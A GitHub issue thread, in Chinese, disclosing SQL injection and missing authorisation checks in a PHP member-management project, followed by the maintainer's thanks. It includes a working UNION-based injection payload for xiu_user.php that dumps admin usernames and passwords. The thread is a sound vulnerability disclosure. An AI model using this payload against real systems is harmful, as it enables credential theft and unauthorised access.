### ISSUE TITLE
SQL注入和越权

### ISSUE THREAD

**Issue by NS-Sp4ce** [chaodada/member#1]
# SQL注入
https://github.com/chaodada/member/blob/a592a60925fec55abd0344c605e9ef118f3bc4d1/user/xiu_user.php#L27
https://github.com/chaodada/member/blob/a592a60925fec55abd0344c605e9ef118f3bc4d1/user/qian_user.php#L29
https://github.com/chaodada/member/blob/a592a60925fec55abd0344c605e9ef118f3bc4d1/user/xiao_user.php#L32
拿xiu_user.php举例
payload
```
xiu_user.php?id=-37 union select 1,2,group_concat(username,0x2a,password,0x20,mpw),4,5,6 from memsystem.u_admin %23
```
![qq 20181203141435](https://user-images.githubusercontent.com/33349032/49356168-c82ba200-f705-11e8-8010-7edece3a0add.png)
![qq 20181203141613](https://user-images.githubusercontent.com/33349032/49356227-02953f00-f706-11e8-9c6d-6de6368564ea.png)
# 越权
xiu_user.php没有对用户身份进行校验 导致更改ID即可查看、更改任意用户信息

**Comment by chaodada** [comment]
首先谢谢大佬的指教，我抽时间试着修复一下。 其次大佬随便耍，学习了学习了　 😁😁
